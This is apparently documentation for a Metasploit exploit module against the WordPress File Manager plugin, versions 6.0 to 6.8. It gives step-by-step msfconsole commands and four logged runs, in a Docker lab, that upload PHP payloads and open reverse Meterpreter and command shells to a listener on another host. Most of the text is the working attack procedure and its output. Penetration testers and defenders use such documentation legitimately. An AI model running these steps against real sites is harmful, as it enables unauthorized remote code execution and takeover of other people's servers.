## Vulnerable Application

Get a copy of version 6.0 plugin from https://downloads.wordpress.org/plugin/wp-file-manager.6.0.zip.

Vulnerable versions are 6.0-6.8. Versions below 6.0 are not vulnerable and version 6.9 has been patched.

## Verification Steps

1. Start msfconsole
2. Do: `use exploit/multi/http/wp_file_manager_rce`
3. Do: `set TARGETURI <target_uri>`
4. Do: `set RHOSTS <target_ip>`
5. Optional: Do: `set RPORT <target_port>`
6. Optional: Do: `set PAYLOAD <payload>` to switch payloads
7. Optional: Do: `set COMMAND <command>` to switch elFinder commands used to exploit vulnerability
7. Do: `check` to confirm existence of vulnerability or `exploit` to let the shells rain

## Options

### COMMAND
This vulnerability can be exploited in 2 ways:
1. `upload` to directly upload a payload
2. `mkfile` to create a file, then `put` to write arbitrary code to the newly created file

This option has 2 valid values:
1. `upload`: exploit using the `upload` technique (default)
2. `mkfile+put`: exploit using `mkfile` and `put` 

## Scenarios

### Docker container, WordPress 5.5.1, File Manager plugin version 6.0, default path for File Manager, default payload, using `upload`

```
msf6 > use exploit/multi/http/wp_file_manager_rce 
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_file_manager_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/wp_file_manager_rce) > set RPORT 8080
RPORT => 8080
msf6 exploit(multi/http/wp_file_manager_rce) > set VERBOSE true
VERBOSE => true
msf6 exploit(multi/http/wp_file_manager_rce) > exploit

[*] Started reverse TCP handler on 192.168.137.128:4444 
[*] Checking /wp-content/plugins/wp-file-manager/readme.txt
[*] Found version 6.0 in the plugin
[*] 127.0.0.1:8080 - Payload is at /wp-content/plugins/wp-file-manager/lib/files/aEiptb.php
[*] Sending stage (39264 bytes) to 172.17.0.3
[*] Meterpreter session 1 opened (192.168.137.128:4444 -> 172.17.0.3:35578) at 2020-10-12 20:19:16 +0800

meterpreter > sysinfo
Computer    : 6fc94cd81e93
OS          : Linux 6fc94cd81e93 5.8.0-kali1-amd64 #1 SMP Debian 5.8.7-1kali1 (2020-09-14) x86_64
Meterpreter : php/linux
meterpreter > getuid
Server username: www-data (33)
meterpreter > 
```

### Docker container, WordPress 5.5.1, File Manager plugin version 6.0, default path for File Manager, `php/reverse_php` payload, using `upload`
```
msf6 exploit(multi/http/wp_file_manager_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/wp_file_manager_rce) > set RPORT 8080
RPORT => 8080
msf6 exploit(multi/http/wp_file_manager_rce) > set VERBOSE true
VERBOSE => true
msf6 exploit(multi/http/wp_file_manager_rce) > set PAYLOAD php/reverse_php
PAYLOAD => php/reverse_php
msf6 exploit(multi/http/wp_file_manager_rce) > exploit

[*] Started reverse TCP handler on 192.168.137.128:4444 
[*] Checking /wp-content/plugins/wp-file-manager/readme.txt
[*] Found version 6.0 in the plugin
[*] 127.0.0.1:8080 - Payload is at /wp-content/plugins/wp-file-manager/lib/files/XFVi0d.php
[*] Command shell session 2 opened (192.168.137.128:4444 -> 172.17.0.3:35598) at 2020-10-12 20:20:04 +0800

uname -a
Linux 6fc94cd81e93 5.8.0-kali1-amd64 #1 SMP Debian 5.8.7-1kali1 (2020-09-14) x86_64 GNU/Linux
whoami
www-data
```

### Docker container, WordPress 5.5.1, File Manager plugin version 6.0, default path for File Manager, default payload, using `mkfile+put`
```
msf6 > use multi/http/wp_file_manager_rce
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_file_manager_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/wp_file_manager_rce) > set RPORT 8080
RPORT => 8080
msf6 exploit(multi/http/wp_file_manager_rce) > set VERBOSE true
VERBOSE => true
msf6 exploit(multi/http/wp_file_manager_rce) > set COMMAND mkfile+put 
COMMAND => mkfile+put
msf6 exploit(multi/http/wp_file_manager_rce) > exploit

[*] Started reverse TCP handler on 192.168.137.128:4444 
[*] Checking /wp-content/plugins/wp-file-manager/readme.txt
[*] Found version 6.0 in the plugin
[*] 127.0.0.1:8080 - Payload is at /wp-content/plugins/wp-file-manager/lib/files/unl8LJ.php
[*] Sending stage (39264 bytes) to 172.17.0.3
[*] Meterpreter session 5 opened (192.168.137.128:4444 -> 172.17.0.3:38076) at 2020-10-15 17:42:00 +0800

meterpreter > sysinfo
Computer    : 6fc94cd81e93
OS          : Linux 6fc94cd81e93 5.8.0-kali1-amd64 #1 SMP Debian 5.8.7-1kali1 (2020-09-14) x86_64
Meterpreter : php/linux
meterpreter > getuid
Server username: www-data (33)
meterpreter > 
```

### Docker container, WordPress 5.5.1, File Manager plugin version 6.0, default path for File Manager, `php/reverse_php` payload, using `mkfile+put`
```
msf6 exploit(multi/http/wp_file_manager_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/wp_file_manager_rce) > set RPORT 8080
RPORT => 8080
msf6 exploit(multi/http/wp_file_manager_rce) > set PAYLOAD php/reverse_php
PAYLOAD => php/reverse_php
msf6 exploit(multi/http/wp_file_manager_rce) > set COMMAND mkfile+put 
COMMAND => mkfile+put
msf6 exploit(multi/http/wp_file_manager_rce) > exploit

[*] Started reverse TCP handler on 192.168.137.128:4444 
[*] Checking /wp-content/plugins/wp-file-manager/readme.txt
[*] Found version 6.0 in the plugin
[*] 127.0.0.1:8080 - Payload is at /wp-content/plugins/wp-file-manager/lib/files/DmFEWt.php
[*] Command shell session 6 opened (192.168.137.128:4444 -> 172.17.0.3:38096) at 2020-10-15 17:43:27 +0800

uname -a
Linux 6fc94cd81e93 5.8.0-kali1-amd64 #1 SMP Debian 5.8.7-1kali1 (2020-09-14) x86_64 GNU/Linux
whoami
www-data
```